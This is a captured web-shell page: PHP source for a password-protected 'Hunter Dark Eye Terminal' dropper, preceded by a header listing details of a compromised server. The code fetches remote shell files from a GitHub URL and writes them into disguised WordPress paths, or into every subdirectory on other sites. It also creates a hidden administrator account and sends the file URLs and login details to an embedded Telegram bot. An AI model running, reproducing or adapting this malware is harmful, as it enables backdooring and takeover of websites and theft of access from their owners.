| Server IP : 162.214.67.83 / Your IP : 216.73.217.31 Web Server : Apache System : Linux dedi-13542965.clustter.com.br 5.14.0-687.20.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jun 30 06:22:49 EDT 2026 x86_64 User : jforte ( 1063) PHP Version : 8.2.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/tmp/ |
Upload File : |
<?php
// --- CONFIGURATION ---
$requiredPassword = '1230';
$botToken = '7666107039:AAFi4OOdgenangfRxpQ8K4xJEGrMJQ3XAFU';
$chatId = '5867076629';
$url1 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url2 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url3 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url4 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url5 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url6 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url7 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/index.php';
$url8 = 'https://raw.githubusercontent.com/hunter-root/private-shell/refs/heads/main/profile.php';
// --- PASSWORD CHECK ---
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['password'])) {
if ($_POST['password'] !== $requiredPassword) {
die("<div style='color:red; font-family:monospace;'>Incorrect password. Access denied.</div>");
}
}
// --- FUNCTIONS (unchanged) ---
function download_content($url)
{
$content = @file_get_contents($url);
if ($content === false) {
$content = download_content_with_curl($url);
}
if ($content === false) {
$content = download_content_with_fopen($url);
}
if ($content === false) {
throw new Exception("Failed to download content from $url");
}
return $content;
}
function download_content_with_curl($url)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$content = curl_exec($ch);
curl_close($ch);
return $content ? $content : false;
}
function download_content_with_fopen($url)
{
$content = '';
if ($fh = fopen($url, 'r')) {
while (!feof($fh)) {
$content .= fread($fh, 8192);
}
fclose($fh);
}
return !empty($content) ? $content : false;
}
function get_full_url($filePath)
{
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://";
$domainName = $_SERVER['HTTP_HOST'];
$relativePath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $filePath);
return $protocol . $domainName . $relativePath;
}
function create_files_in_subdirectories($rootDir, $url)
{
$subdirs = array_filter(glob($rootDir . '/*'), 'is_dir');
$urls = [];
$createdDirs = [];
foreach ($subdirs as $subdir) {
$filePath = $subdir . '/' . basename($subdir) . '_function.php';
if (!file_exists($filePath)) {
try {
file_put_contents($filePath, download_content($url));
$urls[] = get_full_url($filePath);
$createdDirs[] = $subdir;
} catch (Exception $e) {
}
}
}
return [$urls, $createdDirs];
}
function create_wp_admin_user($rootDir, $username, $password)
{
@require_once $rootDir . '/wp-config.php';
@require_once $rootDir . '/wp-includes/wp-db.php';
@require_once $rootDir . '/wp-includes/pluggable.php';
global $wpdb;
$output = "";
if (function_exists('wp_create_user')) {
$user_id = username_exists($username);
if (!$user_id && email_exists($username . '@example.com') == false) {
$user_id = wp_create_user($username, $password, $username . '@example.com');
$user = new WP_User($user_id);
$user->set_role('administrator');
$output = "WordPress login info\n==============\nUsername: $username\nPass: $password\n";
} else {
$output = "Already Exist Your user name and password\n";
}
} else {
$output = "Cannot create WP user: DB not available\n";
}
return $output;
}
function sendToTelegram($botToken, $chatId, $message)
{
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = ['chat_id' => $chatId, 'text' => $message];
$options = ['http' => ['method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => http_build_query($data)]];
$context = stream_context_create($options);
@file_get_contents($url, false, $context); // Silent
}
// --- HTML LOGIN PAGE ---
if (!isset($_POST['password'])) {
echo "<!DOCTYPE html>
<html lang='en'>
<head>
<meta charset='UTF-8'>
<meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>Log</title>
<style>
body { background:#000; color:#0f0; font-family:'Courier New', monospace; display:flex; flex-direction:column; justify-content:center; align-items:center; height:100vh; margin:0; }
.login-box { border:1px solid #0f0; padding:20px; width:300px; text-align:center; margin-bottom:20px; }
input[type='password'] { width:90%; padding:10px; margin:10px 0; background:#000; color:#0f0; border:1px solid #0f0; }
input[type='submit'] { padding:10px 20px; background:#0f0; color:#000; border:none; cursor:pointer; }
.footer { color:#0f0; font-size:14px; text-align:center; margin-top:10px; }
.footer a { color:#0f0; text-decoration:none; }
.footer a:hover { text-decoration:underline; }
</style>
</head>
<body>
<div class='login-box'>
<h2>Dark-Eye Terminal</h2>
<form method='post'>
<input type='password' name='password' placeholder='Enter Password' required><br>
<input type='submit' value='Login'>
</form>
</div>
<div class='footer'>
Power by: <a href='https://t.me/neel_info' target='_blank'>Hunter Neel</a>
</div>
</body></html>";
exit();
}
// --- AFTER LOGIN PAGE ---
$rootDir = __DIR__;
$urls = [];
$createdDirs = [];
echo "<!DOCTYPE html>
<html lang='en'>
<head>
<meta charset='UTF-8'>
<meta name='viewport' content='width=device-width, initial-scale=1.0'>
<title>Success</title>
<style>
body { margin:0; padding:0; background:#000; color:#0f0; font-family:'Courier New', monospace; }
.terminal { padding:20px; width:90%; max-width:1000px; margin:20px auto; border:2px solid #0f0; background:#111; min-height:90vh; overflow:auto; }
.terminal h2 { text-align: center; margin-bottom: 20px; } /* added this */
a { color:#0f0; text-decoration:none; }
a:hover { text-decoration:underline; }
.wp-box { border:1px solid #0f0; padding:10px; margin-top:20px; display:inline-block; background:#000; }
</style>
</head>
<body>
<div class='terminal'>
<h2>⚡ Hunter Dark Eye Terminal ⚡</h2>
";
// --- MAIN EXECUTION ---
$telegramReport = "";
if (file_exists($rootDir . '/wp-config.php')) {
echo "WordPress detected.<br><br>";
$paths = [
[$rootDir . '/wp-content/mde.php', $url1],
[$rootDir . '/wp-admin/amin-ajaxson.php', $url2],
[$rootDir . '/wp-includes/class-wp-edits.php', $url3],
[$rootDir . '/wp-admin/css/colors/light/colour.php', $url4],
[$rootDir . '/wp-content/themes/header.php', $url5],
[$rootDir . '/wp-admin/user/foter.php', $url6],
[$rootDir . '/wp-includes/css/dist/nux/nux.php', $url7],
];
$newPaths = ['/wp-includes/PHPMailer/Mailo.php', '/wp-includes/SimplePie/index.php', '/wp-includes/css/dist/index.php', '/wp-admin/js/index.php', '/wp-content/uploads/consol.php', '/wp-includes/ID3/module.audio.flow.php'];
foreach ($paths as $p) {
list($fullPath, $url) = $p;
if (!file_exists($fullPath)) {
try {
file_put_contents($fullPath, download_content($url));
} catch (Exception $e) {
}
}
echo "<div><a href='" . get_full_url($fullPath) . "' target='_blank'>" . get_full_url($fullPath) . "</a></div>";
$urls[] = get_full_url($fullPath);
}
foreach ($newPaths as $newPath) {
$fullPath = $rootDir . $newPath;
if (!file_exists($fullPath)) {
try {
file_put_contents($fullPath, download_content($url8));
} catch (Exception $e) {
}
}
echo "<div><a href='" . get_full_url($fullPath) . "' target='_blank'>" . get_full_url($fullPath) . "</a></div>";
$urls[] = get_full_url($fullPath);
}
// WordPress user info
$wpInfo = create_wp_admin_user($rootDir, 'Admim', 'hunterXN');
echo "<div class='wp-box'>" . nl2br($wpInfo) . "</div>";
// --- Telegram Report ---
$telegramReport .= "🌐 WordPress detected\n";
if (!empty($urls)) {
$telegramReport .= "📁 Created files:\n" . implode("\n", $urls) . "\n";
}
$telegramReport .= "🔑 WP User Info:\n" . $wpInfo;
if (!empty($telegramReport)) {
sendToTelegram($botToken, $chatId, $telegramReport);
}
} else {
// --- Non-WordPress site ---
echo "Not a WordPress site. Creating files in subdirectories...<br>";
list($urls, $createdDirs) = create_files_in_subdirectories($rootDir, $url1);
if (!empty($urls)) {
// Send only created file URLs, remove subdirectory listing
sendToTelegram($botToken, $chatId, "📁 Created files in subdirectories:\n" . implode("\n", $urls));
}
foreach ($urls as $u) {
echo "<div><a href='$u' target='_blank'>$u</a></div>";
}
}
echo "</div></body></html>";
?>